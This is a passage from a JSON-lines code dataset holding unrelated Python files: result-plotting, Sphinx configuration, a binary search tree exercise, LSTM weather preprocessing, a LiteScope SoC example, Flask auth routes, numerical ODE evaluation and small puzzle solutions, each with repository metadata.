interpret_col_names(ddG_ensemble_vec.index.tolist())\n flag = annotations.loc[close_enough_vec].unique().sum()\n return flag\n \ndef determine_seq_occupancy(seq, temperature):\n \"\"\"Break a seq up into 11 nt chunks and return occupancy relative to consensus site for each seq.\"\"\"\n \n","sub_path":"puflibs/seqmodel_old.py","file_name":"seqmodel_old.py","file_ext":"py","file_size_in_byte":19521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"331283559","text":"import argparse\nimport os\nimport distutils.util\nimport sys\n\nfrom collections import defaultdict\n\n# import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom matplotlib import transforms\n\nfrom __plot_utils import create_scaled_canvases, load_results, process_cli_args\n\nsys.path.append(os.path.normpath(os.path.join(__file__, \"../../../\"))) # noqa\nfrom experimentarium.utils import make_iter\n\nsns.set()\n\n\nDEFAULT_RESULTS_ROOT = os.path.normpath(\n os.path.join(os.path.dirname(__file__), \"../../../merged_results\")\n)\n\nDEFAULT_OUT_ROOT = os.path.normpath(\n os.path.join(os.path.dirname(__file__), \"../../../plots\")\n)\n\n\nif __name__ == \"__main__\":\n # ======================================================================\n # Parser setting up.\n # ======================================================================\n\n parser = argparse.ArgumentParser(\n \"Plotter\", formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n \"--results-root\",\n type=str,\n help=\"Path to merged results or directory with files to merge\",\n )\n parser.add_argument(\"--out-root\", type=str, help=\"Directory to save plots\")\n parser.add_argument(\n \"--last\",\n type=distutils.util.strtobool,\n help=\"Whether to take the last created file if --results-root is directory\",\n )\n parser.add_argument(\"--extention\", type=str, help=\"Extention of saved plots\")\n parser.add_argument(\"--metrics\", type=str, nargs=\"+\", help=\"Metrics to plot\")\n parser.add_argument(\n \"--hard-tresholding\",\n type=distutils.util.strtobool,\n help=\"Whether not to display models with scores less than threshold\",\n )\n parser.add_argument(\n \"--threshold\",\n type=float,\n help=\"Threshold to set for soft and hard thresholding\",\n )\n parser.add_argument(\n \"--progress-bar\",\n type=distutils.util.strtobool,\n help=\"Whether to show progress bar over processed benchmarks\",\n )\n parser.add_argument(\n \"--benchmarks\", type=str, nargs=\"*\", help=\"Which benchmarks to plot\",\n )\n parser.add_argument(\n \"--joint-plots\",\n type=distutils.util.strtobool,\n help=\"Whether to plot joint plots. False means plotting only sl/ssl plots\",\n )\n parser.add_argument(\n \"--max-diff-display\",\n type=float,\n help=\"Maximum absolute value on difference score plots\",\n )\n\n parser.set_defaults(\n results_root=DEFAULT_RESULTS_ROOT,\n out_root=DEFAULT_OUT_ROOT,\n last=\"True\",\n extention=\"png\",\n metrics=[\"accuracy\", \"f1\"],\n hard_thresholding=\"True\",\n threshold=0.5,\n progress_bar=\"True\",\n benchmarks=[\"all\"],\n joint_plots=\"True\",\n max_diff_display=0.04,\n )\n args = parser.parse_args()\n process_cli_args(args)\n\n # ======================================================================\n # Plotting things.\n # ======================================================================\n df = load_results(args)\n args.benchmarks.intersection_update(pd.unique(df[\"benchmark\"]))\n df = df[df[\"benchmark\"].isin(args.benchmarks)]\n\n if not args.benchmarks:\n raise ValueError(f\"None of provided benchmarks is found in loaded data.\")\n\n metrics = list(set(df.columns).intersection(set(args.metrics)))\n if not metrics:\n raise ValueError(\"No given metric found in merged dataframe.\")\n\n models = tuple(pd.unique(df[\"model\"]))\n # markers = tuple(\n # marker\n # for marker in matplotlib.markers.MarkerStyle.markers\n # if marker not in {\",\", \"\", \" \", \"None\", None}\n # )\n markers = (\"s\", \"o\", \"v\", \"X\")\n colors = sns.color_palette(\"muted\")\n\n model2marker = dict(zip(models, markers))\n model2color = dict(zip(models, colors))\n\n linestyle2ssl = {True: \"-\", False: \"-.\"}\n marker2ssl = {True: \"P\", False: \"o\"}\n\n # Lsize/Ratio -> Metrics -> Benchmark -> Model -> Score\n diffs = defaultdict(lambda: defaultdict(lambda: defaultdict(dict)))\n\n # ======================================================================\n # Plotting joint results.\n # ======================================================================\n\n for benchmark, benchmark_df in make_iter(\n df.groupby(\"benchmark\"),\n args.progress_bar,\n desc=\"#Benchmarks processed/joint plots plotted\",\n ):\n if args.joint_plots:\n canvases = create_scaled_canvases(\n metrics, benchmark, [\"Accuracy\", \"F1 score\"]\n )\n\n for model, model_df in benchmark_df.groupby(\"model\"):\n ratios = pd.unique(model_df[\"ratio\"])\n lsizes = pd.unique(model_df[\"lsize\"])\n scale = lsizes[0] / ratios[0]\n\n # Some model may not have a baseline, but to build difference plot there are\n # needed both.\n add_to_diff = len(pd.unique(model_df[\"is_ssl\"])) == 2\n is_ssl_groupby = model_df.groupby(\"is_ssl\")\n\n if add_to_diff:\n diff_scores = np.subtract(\n *[\n np.maximum(_df[metrics].to_numpy(), 0.5)\n for _, _df in is_ssl_groupby\n ]\n )\n\n for is_ssl, is_ssl_df in is_ssl_groupby:\n\n for i, metric in enumerate(metrics):\n\n scores = np.maximum(is_ssl_df[metric].to_numpy(), 0.5)\n mask = scores > args.threshold\n if args.hard_tresholding and np.any(mask == False): # noqa\n mask = np.zeros_like(mask, dtype=np.bool)\n\n if np.any(mask == True): # noqa\n masked_ratios = ratios[mask]\n masked_scores = scores[mask]\n\n if args.joint_plots:\n canvases[metric].ax.plot(\n masked_ratios,\n masked_scores,\n label=\"{}, {}\".format(\n model.upper(), \"SSL\" if is_ssl else \"Baseline\"\n ),\n color=model2color[model],\n marker=marker2ssl[is_ssl],\n linestyle=linestyle2ssl[is_ssl],\n )\n canvases[metric].rescale(scale)\n\n if add_to_diff:\n for ratio, score, diff_score in zip(\n masked_ratios, masked_scores, diff_scores[mask, i]\n ):\n diffs[ratio][metric][benchmark][model] = diff_score\n\n if args.joint_plots:\n benchmark_root = os.path.join(args.out_root, \"joint_plots\", benchmark)\n try:\n os.makedirs(benchmark_root)\n except FileExistsError:\n pass\n\n for metric in metrics:\n canvases[metric].fig.savefig(\n os.path.join(benchmark_root, f\"{metric}.{args.extention}\")\n )\n plt.close(\"all\")\n\n # ======================================================================\n # Plotting score difference.\n # ======================================================================\n diff_out_root = os.path.join(args.out_root, \"score_difference\")\n max_diff_display = args.max_diff_display\n\n # Lsize/Ratio -> Metrics -> Benchmark -> Model -> Score\n def set_label(labelled_models: set, model: str) -> dict:\n if model in labelled_models:\n return dict()\n return dict(label=model)\n\n def sign2color(score: float) -> str:\n if score == 0:\n return \"black\"\n elif score > 0:\n return \"green\"\n return \"red\"\n\n # https://stackoverflow.com/a/43130355\n def offset(p):\n return transforms.ScaledTranslation(p / 72.0, 0, plt.gcf().dpi_scale_trans)\n\n handles = dict()\n marker_size = 60\n variance = 10\n figsize = (15, 15)\n\n for lsize, mapping in make_iter(\n diffs.items(), args.progress_bar, desc=\"#Difference plots plotted\"\n ):\n lsize_root = os.path.join(\n diff_out_root, f\"lsize_{str(lsize).replace('.', '_')}\"\n )\n try:\n os.makedirs(lsize_root)\n except FileExistsError:\n pass\n for metric, mapping_ in mapping.items():\n labelled_models = set()\n fig, ax = plt.subplots(figsize=figsize)\n trans_data = plt.gca().transData\n ax.tick_params(axis=\"x\", labelrotation=45)\n ax.set_title(f\"{metric} difference at ratio {lsize}\")\n ax.set_ylabel(f\"Difference\")\n for benchmark, mapping__ in mapping_.items():\n for idx, (model, score) in enumerate(mapping__.items()):\n if score <= -max_diff_display:\n score = -max_diff_display - 1e-3\n elif score >= max_diff_display:\n score = max_diff_display + 1e-3\n ax.scatter(\n benchmark,\n score,\n marker=model2marker[model],\n color=sign2color(score),\n edgecolor=\"black\",\n **set_label(labelled_models, model),\n s=marker_size,\n alpha=0.75,\n transform=trans_data\n + offset(variance * ((idx + 1) // 2) * (-1) ** idx),\n )\n if not handles.get(model):\n handles[model] = plt.scatter(\n [],\n [],\n marker=model2marker[model],\n color=\"None\",\n edgecolor=\"black\",\n label=model,\n )\n labelled_models.add(model)\n ax.axhline(max_diff_display, linestyle=\"--\")\n ax.axhline(-max_diff_display, linestyle=\"--\")\n ax.legend(\n handles=list(handles.values()),\n numpoints=1,\n bbox_to_anchor=(1.1, 0.5),\n borderaxespad=0,\n )\n fig.savefig(os.path.join(lsize_root, f\"{metric}.{args.extention}\"))\n plt.close(\"all\")\n","sub_path":"experimentarium/tools/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"306672684","text":"\"\"\"\n Options for sphinx\n Add project specific options to conf.py in the root folder\n\"\"\"\nimport sphinx_rtd_theme\nimport os\n\nthis_dir = os.path.abspath(os.path.dirname(__file__))\nsupport_dir = os.path.join(this_dir, \"..\", \"support\")\n\nextensions = ['sphinx.ext.autodoc']\n\nhtml_theme = 'the_theme'\nhtml_theme_path = [os.path.join(support_dir, 'templates'), sphinx_rtd_theme.get_html_theme_path()]\nhtml_static_path = [os.path.join(support_dir, \"static\"), os.path.join(sphinx_rtd_theme.get_html_theme_path(), \"sphinx_rtd_theme\", \"static\")]\n\nexclude_patterns = []\n\nmaster_doc = 'index'\nsource_suffix = '.rst'\n\npygments_style = 'pastie'\n\n# Add options specific to this project\nlocation = os.path.join(this_dir, '../conf.py')\nwith open(location) as f:\n code = compile(f.read(), location, 'exec')\n exec(code, globals(), locals())\n","sub_path":"docs/docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"133430762","text":"# -*- coding: utf-8 -*-\n\n\nclass Node:\n def __init__(self, data=None, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\n def __str__(self):\n return str(self.data)\n\n def insert(self, data):\n if self.data < data:\n if self.right:\n self.right.insert(data)\n else:\n self.right = Node(data)\n elif self.data > data:\n if self.left:\n self.left.insert(data)\n else:\n self.left = Node(data)\n else:\n pass\n\n def count(self):\n counter = 1\n if self.left:\n counter += self.left.count()\n if self.right:\n counter += self.right.count()\n return counter\n\n def search(self, data):\n if self.data == data:\n return True\n if data < self.data:\n if self.left:\n return self.left.search(data)\n else:\n if self.right:\n return self.right.search(data)\n return False\n\ndef max_bst(top):\n if not top:\n raise Exception(\"Drzewo puste\")\n max_found = top.data\n if top.right:\n max_found = max(max_bst(top.right),max_found)\n if top.left:\n max_found = max(max_bst(top.left),max_found)\n return max_found\n\ndef min_bst(top):\n if not top:\n raise Exception(\"Drzewo puste\")\n min_found = top.data\n if top.right:\n min_found = min(min_bst(top.right),min_found)\n if top.left:\n min_found = min(min_bst(top.left),min_found)\n return min_found\n \nroot = None\ntry:\n min_bst(None)\nexcept Exception:\n print(\"puste drzewo\")\n\n\nroot = Node(23)\nroot.insert(1)\nroot.insert(12)\nroot.insert(1224)\nroot.insert(828)\nroot.insert(123)\nroot.insert(234)\nroot.insert(5212)\nroot.insert(1)\n\nprint(\"Wartość największa: \"+str(max_bst(root)))\nprint(\"Wartość najmniejsza: \"+str(min_bst(root)))","sub_path":"zestaw-9/908.py","file_name":"908.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"384923174","text":"from statistics import mean\nfrom sys import stdin\n\nstudents = {}\nnext(stdin)\nfor line in stdin:\n try:\n name, *marks = line.split()\n students[name] = mean(map(float, marks))\n except ValueError:\n print('{:.2f}'.format(students[line.rstrip()]))\n","sub_path":"Python/Introduction/finding_the_percentage.py","file_name":"finding_the_percentage.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"2606881","text":"import os.path as osp\nimport pickle\n\nimport mastic.interactions.pi_stacking as pinx\nimport mastic.interactions.hydrogen_bond as hinx\n\nwork_dir = \"/home/salotz/Dropbox/devel/mastic/work/pi_stacking\"\n\n# load the SystemType\nbenzene_system_pkl_path = osp.join(work_dir, \"Benzene_Benzene_SystemType.pkl\")\nwith open(benzene_system_pkl_path, 'rb') as rf:\n Benzene_Benzene_SystemType = pickle.load(rf)\n\n# load the coordinates for the reference benzene\nref_benzene_PDB_path = osp.join(work_dir, \"ref_benzene.pdb\")\n\nfrom rdkit import Chem\n\nref_benzene_rdkit = Chem.MolFromPDBFile(ref_benzene_PDB_path, removeHs=False, sanitize=False)\n\nfrom mastic.interfaces.rdkit import RDKitMoleculeWrapper\n\nbenzene_rdkit_wrapper = RDKitMoleculeWrapper(ref_benzene_rdkit, mol_name=\"benzene\")\n\nref_benzene_coords = benzene_rdkit_wrapper.get_conformer_coords(0)\n\nfrom mastic.interactions.pi_stacking import PiStackingType\n\n# get the interaction space for pi-stacking\npistack_inx_classes = Benzene_Benzene_SystemType.interaction_space([(0,1)], PiStackingType)[(0,1)]\n\n# profile the stacked one that should qualify\nstacked_member_coords = [ref_benzene_coords, test_benzenes['stacked']]\nstacked_system = Benzene_Benzene_SystemType.to_system(stacked_member_coords)\n\n# profile the interactions between the two rings\nstacked_inxs = stacked_system.associations[0].\\\n profile_interactions([PiStackingType],\n interaction_classes=pistack_inx_classes)\\\n [PiStackingType]\n\n# substantiate the systems and profile each one\ntest_inxs = {}\ntest_failed_hits = {}\nfor test_name, test_benzene in test_benzenes.items():\n member_coords = [ref_benzene_coords, test_benzene]\n system = Benzene_Benzene_SystemType.to_system(member_coords)\n\n # profile the interactions between the two rings\n failed_hits, all_inxs = system.associations[0].\\\n profile_interactions([PiStackingType],\n interaction_classes=pistack_inx_classes,\n return_failed_hits=True)\n inxs = all_inxs[PiStackingType]\n test_failed_hits[test_name] = failed_hits\n test_inxs[test_name] = inxs\n","sub_path":"work/pi_stacking/profile_test_cases.py","file_name":"profile_test_cases.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"363712696","text":"import numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport start\n\nclass flow_graph():\n def __init__(self, graph):\n self.graph = graph\n for i in range(len(self.graph[0])):\n for j in range(len(self.graph[0])):\n if j == len(self.graph[0])-1:\n self.graph[i][j] = 1\n else:\n if self.graph[i][j] == 0:\n self.graph[i][j] = -1\n else:\n self.graph[i][j] = 0\n self.net_flow = [0]*len(graph[0])\n self.source = 0\n self.sink = len(graph[0])-1\n self.current = source\n self.score = np.infty\n\n def getState(self):\n return self.graph\n\n def getMove(self, action):\n if self.current == self.sink:\n return self.score\n move = int(action*len(self.graph[0]))\n if self.graph[self.current][move] == 0:\n return -100\n else:\n self.score = min(self.score, self.graph[self.current][move])\n self.current = move\n return -1 \n\nclass agent():\n def __init__(self, lr, gamma, graph):\n self.gamma = gamma\n self.reward_graph = graph\n self.q = np.zeros([10, 10])\n self.current = 0\n self.sink = 9\n\n def update(self):\n end = False\n v = 0\n while not end:\n valid = False\n check = 0\n for j in range(10):\n if self.reward_graph[self.current][j] > -1:\n check+=1\n if check == 0:\n return -1\n while not valid:\n i = np.random.randint(0, 10)\n if self.reward_graph[self.current][i] > -1:\n valid = True\n maxq = 0\n v+=1\n for j in range(10):\n if self.reward_graph[i][j] > -1:\n if self.q[i][j] > maxq:\n maxq = self.q[i][j]\n self.q[self.current][i] = self.reward_graph[self.current][i]+self.gamma*maxq\n if i == self.sink:\n end = True\n else:\n self.current = i\n if v > 10:\n end = True\n\nepisodes = 500\nex_graph_1 = start.generate_random_graph(10, 0.4, 15)\nprint(start.edmonds_karp(ex_graph_1))\ndone = False\nmaxf = 0\nwhile not done:\n graph = np.zeros([10, 10])\n for i in range(len(graph[0])):\n for j in range(len(graph[0])):\n if ex_graph_1[i][j] > 0:\n if j == 9:\n graph[i][j] = 1\n else:\n graph[i][j] = 0\n else:\n graph[i][j] = -1\n bond = agent(1, 0.9, graph)\n for i in range(episodes):\n bond.update()\n current = 0\n maxq = 0\n maxi = 0\n fin = False\n path = [0]\n count = 0\n for k in range(10):\n if bond.q[k][9] != 0:\n count+=1\n if count == 0:\n break\n while not fin:\n for i in range(10):\n if(bond.q[current][i] > maxq):\n maxq = bond.q[current][i]\n maxi = i\n path.append(maxi)\n if maxi == 9:\n fin = True\n else:\n current = maxi\n minf = 15\n for x in range(len(path)-1):\n minf = min(minf, ex_graph_1[path[x]][path[x+1]])\n maxf+=minf\n for x in range(len(path)-1):\n ex_graph_1[path[x]][path[x+1]] -= minf\n ex_graph_1[path[x+1]][path[x]] += minf\nprint(maxf)","sub_path":"gamenn.py","file_name":"gamenn.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352164510","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport os\r\nimport fnmatch\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom scipy.stats import yeojohnson\r\nfrom tensorflow.python.keras.optimizer_v2.rmsprop import RMSProp\r\nfrom math import sqrt\r\nfrom numpy import concatenate\r\nfrom matplotlib import pyplot\r\nfrom pandas import read_csv, DataFrame, concat\r\nfrom sklearn.preprocessing import MinMaxScaler, LabelEncoder, PowerTransformer\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense, RepeatVector, LSTM, Input, TimeDistributed, Activation, Dropout\r\nfrom keras.optimizers import SGD\r\nfrom sklearn.compose import ColumnTransformer\r\nnp.set_printoptions(suppress=True)\r\n\r\n#variables\r\npowhr_start = 5\r\npowhr_end = 20\r\nshift_days = 3\r\nhoursteps = powhr_end-powhr_start+1 #(16)\r\ntimesteps = shift_days*hoursteps #hours step\r\ndata_dim = 7\r\nout_dim = 1\r\nn_model = 10\r\n\r\ndata_dir = '../Data'\r\nseason_mod = 'all_1102_f7'\r\ndate_start = '10190901'\r\ndate_end = '30191201'\r\nerr_date_list = ['20190912', '20191122', '20191130', '20191028', '20191107', '20191108', '20191109', '20191110', '20191111', '20191112', '20200214', '20200307', '20200308', '20200309', '20200310', '20200328', '20200329', '20200625', '20200809']\r\n\r\n#############################################\r\n# 종관기상관측\r\n#############################################\r\ndef get_weather():\r\n # pow 파일 load\r\n file_list = os.listdir(data_dir)\r\n print(len(file_list))\r\n for filename in os.listdir(data_dir):\r\n if fnmatch.fnmatch(filename, 'OBS_ASOS_TIM_*.csv'):\r\n print(filename)\r\n\r\n # load csv data\r\n dataset = read_csv(data_dir+'/'+filename, encoding='CP949')\r\n dataset.drop(['지점','지점명'], axis=1, inplace=True)\r\n dataset.drop(['기온 QC플래그','강수량 QC플래그','풍속 QC플래그','풍향 QC플래그','습도 QC플래그'], axis=1, inplace=True)\r\n dataset.drop(['현지기압 QC플래그','해면기압 QC플래그','일조 QC플래그','지면온도 QC플래그'], axis=1, inplace=True)\r\n dataset.drop(['5cm 지중온도(°C)','10cm 지중온도(°C)','20cm 지중온도(°C)','30cm 지중온도(°C)'], axis=1, inplace=True)\r\n dataset.drop(['3시간신적설(cm)','일사(MJ/m2)','운형(운형약어)','지면상태(지면상태코드)','현상번호(국내식)'], axis=1, inplace=True)\r\n\r\n # set column name\r\n dataset.columns = ['ymdhms', 'temprt', 'rain', 'wnd_spd', 'wnd_dir', 'humdt','steampressr', 'dewpnt', 'pressr','seapressr','sunshine','snow','cloud','cloud2','mincloud','visiblt','grd_temprt']\r\n\r\n # prioirty sort (피어슨상관계수)\r\n dataset = dataset[['ymdhms','sunshine','humdt','wnd_spd','visiblt','cloud2', 'cloud','grd_temprt','wnd_dir','dewpnt','steampressr','temprt','mincloud','rain','pressr','seapressr','snow']]\r\n\r\n # set NA data (관측값 0이 누적되어 결측된 경우. 0으로 세팅)\r\n dataset['rain'].fillna(0, inplace=True) #강수량\r\n dataset['sunshine'].fillna(0, inplace=True) #일조\r\n dataset['snow'].fillna(0, inplace=True) #적설량\r\n\r\n #일시 패턴 변환(2019-08-20 5:00 -> 2019082005)\r\n dataset['ymdhms'] = dataset['ymdhms'].str[0:4]+dataset['ymdhms'].str[5:7]+dataset['ymdhms'].str[8:10]+dataset['ymdhms'].str[11:13]\r\n # pow측정값 중 결측값 많은 일자 제거\r\n dataset = dataset[(dataset['ymdhms'].str[0:8]>=date_start) & (dataset['ymdhms'].str[0:8]=str(powhr_start).rjust(2, '0')) &(dataset['ymdhms'].str[-2:]<=str(powhr_end))]\r\n dataset = dataset.interpolate(method='linear')# 결측값 보간\r\n \r\n # save file (test용)\r\n dataset.to_csv(data_dir+\"/weather.csv\",mode='w',index=False)\r\n\r\n # normalization\r\n dataset.drop(['ymdhms'], axis=1, inplace=True)\r\n dataset = dataset.astype('float32')\r\n dataset = dataset.interpolate(method='linear')\r\n \r\n #YEO-JOHNSON transform\r\n yeo_df = yeo_johnson_transform(dataset)\r\n \r\n #insert feature (test)\r\n yeo_df.insert(2, 'temp_press', yeo_df['temprt']-yeo_df['steampressr'], True)\r\n yeo_df.insert(2, 'sunshine_humdt', abs(yeo_df['sunshine'])-(yeo_df['humdt']*(2.1)), True)#0.35\r\n \r\n sc = MinMaxScaler(feature_range = (0, 1))#scale\r\n scaled_weather = sc.fit_transform(yeo_df.values)\r\n weather = pd.DataFrame(scaled_weather, columns=yeo_df.columns, index=list(yeo_df.index.values))\r\n print(\"before : \", weather.shape)\r\n weather = weather.iloc[:, 0:data_dim] #feature size 조절\r\n print(\"after : \", weather.shape)\r\n \r\n return weather\r\n\r\n#############################################\r\n# 태양광 전력\r\n#############################################\r\ndef get_pow():\r\n\r\n # pow 파일 load\r\n dir_path = data_dir+\"/pow_24/UR00000126_csv\"\r\n file_list = os.listdir(dir_path)\r\n print(len(file_list))\r\n hrPow = [] \r\n\r\n # pow측정값 에러가 큰 일자 제거\r\n for filename in file_list:\r\n if (filename[:-4] not in err_date_list):\r\n if ((filename[:-4]>=date_start) & (filename\n# License: BSD\n\nfrom migen import *\n\nfrom litex.build.io import CRG\n\nfrom litex.soc.integration.soc_core import SoCMini\n\nfrom litescope import LiteScopeIO, LiteScopeAnalyzer\n\n# LiteScope SoC ------------------------------------------------------------------------------------\n\nclass LiteScopeSoC(SoCMini):\n def __init__(self, platform):\n sys_clk_freq = int((1e9/platform.default_clk_period))\n\n # SoCMini ----------------------------------------------------------------------------------\n SoCMini.__init__(self, platform, sys_clk_freq,\n csr_data_width = 32,\n with_uart = True,\n uart_name = \"bridge\",\n ident = \"Litescope example design\",\n ident_version = True,\n )\n\n # CRG --------------------------------------------------------------------------------------\n self.submodules.crg = CRG(platform.request(platform.default_clk_name))\n\n # Litescope IO -----------------------------------------------------------------------------\n self.submodules.io = LiteScopeIO(8)\n self.add_csr(\"io\")\n for i in range(8):\n try:\n self.comb += platform.request(\"user_led\", i).eq(self.io.output[i])\n except:\n pass\n\n # Litescope Analyzer -----------------------------------------------------------------------\n analyzer_groups = {}\n\n # Counter group\n counter = Signal(16, name_override=\"counter\")\n zero = Signal(name_override=\"zero\")\n self.sync += counter.eq(counter + 1)\n self.comb += zero.eq(counter == 0)\n analyzer_groups[0] = [\n zero,\n counter,\n ]\n\n # Communication group\n analyzer_groups[1] = [\n platform.lookup_request(\"serial\").tx,\n platform.lookup_request(\"serial\").rx,\n self.bus.masters[\"uartbone\"],\n ]\n\n # FSM group\n fsm = FSM(reset_state=\"STATE1\")\n self.submodules += fsm\n fsm.act(\"STATE1\",\n NextState(\"STATE2\")\n )\n fsm.act(\"STATE2\",\n NextState(\"STATE1\")\n )\n analyzer_groups[2] = [\n fsm,\n ]\n\n # Analyzer\n self.submodules.analyzer = LiteScopeAnalyzer(analyzer_groups, 512, csr_csv=\"test/analyzer.csv\")\n self.add_csr(\"analyzer\")\n\ndefault_subtarget = LiteScopeSoC\n","sub_path":"examples/targets/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638837760","text":"from flask import Blueprint\nfrom flask_restful import Api, Resource\nfrom web.modules.auth.controllers import (AuthorizationController,\n IsAuthenticatedController,\n LogoutController, RefreshController,\n RegistrationController)\n\nbp = Blueprint('oauth', __name__)\napi = Api(bp)\n\n\"\"\"[define routing under oauth module]\n\"\"\"\napi.add_resource(RegistrationController, '/registration')\napi.add_resource(AuthorizationController, '/authorization')\napi.add_resource(RefreshController, '/refresh')\napi.add_resource(IsAuthenticatedController, '/isauthenticated')\napi.add_resource(LogoutController, '/logout')\n","sub_path":"web/modules/auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191088542","text":"import sys\nread=lambda:sys.stdin.readline().strip()\nwrite=lambda x:sys.stdout.write(x+\"\\n\")\ntable = [[None for _ in range(15)] for __ in range(5)]\nfor i in range(5):\n line = read()\n for j, ch in enumerate(line):\n table[i][j] = ch\nsb = ''\nfor j in range(15):\n for i in range(5):\n v = table[i][j]\n if not v:\n continue\n sb += v\nwrite(sb)\n\n","sub_path":"KOI/vertical_reading_10798.py","file_name":"vertical_reading_10798.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"366050943","text":"\"\"\"\nEmpirically evaluate the asymptotic error behavior of\ndifferent numerical methods of solving diff eqs.\n\"\"\"\n\nimport math\n\nfrom scipy.integrate import odeint\n\nfrom diffeq.numerical import (euler_step, rk2_step, rk3_step, third_order_step, fourth_order_step,\n numerical_solve)\n\n\nSTEP_FNS = {\n 'euler': euler_step,\n 'rk2': rk2_step,\n 'rk3': rk3_step,\n '3rd': third_order_step,\n '4th': fourth_order_step,\n}\n\n\ndef main():\n print('Evaluating single steps...')\n evaluate_steps()\n print('Evaluating full solutions...')\n evaluate_solutions()\n\n\ndef evaluate_steps():\n fns = [lambda x, y: y ** 2 - x,\n lambda x, y: x ** 2 - y,\n lambda x, y: math.sin(x) * math.cos(y)]\n for i, fn in enumerate(fns):\n print('Equation %d:' % i)\n solution1 = odeint(fn, 0, [1, 1.15], tfirst=True)[-1][0]\n solution2 = odeint(fn, 0, [1, 1.3], tfirst=True)[-1][0]\n for name, step_fn in STEP_FNS.items():\n _, approx1 = step_fn(fn, 1, 0, 0.15)\n _, approx2 = step_fn(fn, 1, 0, 0.3)\n error1 = abs(approx1 - solution1)\n error2 = abs(approx2 - solution2)\n print(' - %s: halving factor %f (error=%e)' % (name, error2 / error1, error1))\n\n\ndef evaluate_solutions():\n fns = [lambda x, y: y ** 2 - x,\n lambda x, y: x ** 2 - y,\n lambda x, y: math.sin(x) * math.cos(y)]\n for i, fn in enumerate(fns):\n print('Equation %d:' % i)\n solution = odeint(fn, 0, [1, 2], tfirst=True)[-1][0]\n for name, step_fn in STEP_FNS.items():\n solution1 = last(numerical_solve(fn, 1, 0, 2, h=0.1, step_fn=step_fn))[1]\n solution2 = last(numerical_solve(fn, 1, 0, 2, h=0.05, step_fn=step_fn))[1]\n error1 = abs(solution - solution1)\n error2 = abs(solution - solution2)\n print(' - %s: halving factor %f (error=%e)' % (name, error1 / error2, error2))\n\n\ndef last(iterator):\n y = None\n for x in iterator:\n y = x\n return y\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"eval_numerical.py","file_name":"eval_numerical.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392315304","text":"class Solution:\n def largeGroupPositions(self, S):\n \"\"\"\n :type S: str\n :rtype: List[List[int]]\n \"\"\"\n cur_c = ''\n cur_c_cnt = 0\n cur_c_start = 0\n large_groups = []\n\n for i, c in enumerate(S):\n if c != cur_c:\n if cur_c_cnt >= 3:\n large_groups.append([cur_c_start,i-1])\n cur_c = c\n cur_c_cnt = 1\n cur_c_start = i\n else:\n cur_c_cnt +=1\n \n # handle the case of ending on a single word\n if cur_c_cnt >= 3:\n large_groups.append([cur_c_start,i])\n \n return large_groups\n \n ","sub_path":"830_large_groups.py","file_name":"830_large_groups.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"410944568","text":"from code_generator_constants import *\r\nfrom grammar_sets import *\r\n\r\ndef createSynthia():\r\n createSynthiaHead()\r\n createSynthiaProdChecks()\r\n createSynthiaMain()\r\n\r\ndef createSynthiaHead():\r\n with open(GEN_PATH + 'synthia_base.py', 'r') as f:\r\n file = open(SYNTHIA_PATH + 'synthia.py', 'w')\r\n file.write(f.read())\r\n file.close()\r\n\r\ndef createSynthiaProdChecks():\r\n file = open(SYNTHIA_PATH + 'synthia.py', 'a')\r\n\r\n production_rules = []\r\n with open(GEN_PATH + 'grammar_productions.log', 'r') as f:\r\n production_rules = f.readlines()\r\n\r\n prod_rules = []\r\n for production_rule in production_rules:\r\n prod_rules.append(production_rule.replace('\\n', '').split('->'))\r\n\r\n for prod_rule in prod_rules:\r\n prod_rule[0] = prod_rule[0].replace(' ', '')\r\n prod_rule[1] = prod_rule[1].split('|')\r\n for sides in prod_rule[1]:\r\n sides = sides.split(\" \")\r\n\r\n for prod_rule in prod_rules:\r\n LHSs = []\r\n for LHS in prod_rule[1]:\r\n LHS = LHS.split(\" \")\r\n LHSs.append([x for x in LHS if x != ''])\r\n prod_rule[1] = LHSs\r\n\r\n for prod_rule in prod_rules:\r\n createSynthiaProdCheck(prod_rule)\r\n\r\n file.close()\r\n\r\ndef createSynthiaProdCheck(prod_rule):\r\n file = open(SYNTHIA_PATH + 'synthia.py', 'a')\r\n\r\n file.write('\\n def ' + prod_rule[0] + '(self):\\n')\r\n prods = 